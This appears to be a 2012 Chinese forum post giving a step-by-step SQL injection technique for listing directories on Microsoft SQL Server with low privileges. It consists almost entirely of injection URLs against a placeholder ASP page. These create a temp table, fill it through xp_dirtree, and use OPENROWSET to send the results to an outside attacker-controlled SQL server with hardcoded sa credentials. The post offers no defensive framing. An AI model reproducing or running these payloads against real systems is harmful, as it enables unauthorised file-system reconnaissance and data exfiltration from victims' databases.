MssqlPublic权限列目录方法

[复制链接]
查看276 | 回复0 | 2012-4-1 19:17:42 | 显示全部楼层 |阅读模式
by:普瑞斯特blog
1、注入点执行

aaa.comx.asp?id=123;createtable%23%23dhtemq(listintnotnullidentity(1,1),dirtreenvarchar(500),num1nvarchar(500),num2nvarchar(500))
2、注入点执行

aaa.comx.asp?id=123;insertinto%23%23dhtemq(dirtree,num1,num2)execmaster.dbo.xp_dirtree[d:\],1,1;--
3、注入点执行

aaa.comx.asp?id=123;insertintoOPENROWSET('sqloledb','server=xx.xx.xx.xx,1433;InitialCatalog=master;uid=sa;pwd=woshinidie','selectdirtree,num1,num2fromdhtemq')selectdirtree,num1,num2from##dhtemq

xx.xx.xx.xx执行

select*fromdhtemq

 
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则